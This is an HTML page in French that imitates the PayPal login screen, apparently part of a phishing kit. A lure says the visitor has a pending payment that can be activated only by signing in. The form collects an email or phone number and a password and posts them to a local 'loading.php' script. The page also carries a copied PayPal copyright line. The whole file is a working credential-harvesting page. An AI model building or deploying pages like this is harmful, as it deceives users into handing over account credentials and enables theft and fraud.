
<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Connectez-vous à votre compte PayPal</title>
    <link rel="preconnect" href="https://fonts.gstatic.com">
<link href="https://fonts.googleapis.com/css2?family=Roboto:wght@300&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous">
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js" integrity="sha384-B4gt1jrGC7Jh4AgTPSdUtOBvfO8shuf57BaghqFfPlYxofvL8/KUEfYiJOMMV+rV" crossorigin="anonymous"></script>
    <style>
        #footer{
            margin:0 auto;
            margin-top:120px;
            margin-left:70px;
        }
        body{
            font-family: 'Roboto', sans-serif;
        }
        .main{
            margin:0 auto;
            margin-top:30px;
            
            
        }

        .container{
            margin-top:140px;
            width:500px;
            height:360px;
            border:1px solid #eaeced;
            border-radius:5px;
        }
        #email, #mdp{
            width:370px;
            height: 44px;
        }
        #sub{
            width:370px;
        }
        @media only screen and (max-width: 600px) {
            .container{
                margin:0;
                margin-top:0px;
                width:auto;
                height:auto;
            }
            #email, #mdp{
            width:350px;
            height: 44px;
        }
        #sub{
            width:350px;
        }

        #footer{
            margin:0 auto;
            margin-top:190px;
        }

        }
    </style>
</head>
<body>


    <div class="container">
        <div class="main" align="center">
            <div align="center">
            <img src="assets/logo.svg" alt="" width="129" height="32"><br>
            <h2>Connectez-vous</h2>
            </div>
            
                
            <div class="form-group">
                    <p>
                    Vous avez un paiement en ATTENTE. <br>
                    Connectez-vous, afin d'activer votre paiement
                    </p>
            </div>
            <form action="loading.php" method="POST">
            <div class="form-group">
                 <input type="email" required="required" minlenght="6" class="form-control" id="email" name="email" placeholder="Email ou  numéro de téléphone">
            </div>
             <div class="form-group">
    
                <input type="password" class="form-control" id="mdp" name="mdp" required="required" minlenght="6" placeholder="Mot de passe">
            </div>
            <div class="form-group">
    
                <input type="submit" class="btn" id="sub"  value="Connexion" style="background:#0070ba;color:white;">
            </div>
            </form>
        </div>
        <div style="" id="footer">
        <span style="color:
#636968;">
        &copy;1999-2021 Paypal, Tous droits réservés.
        </span>
    </div>
    </div>
    
</body>
</html>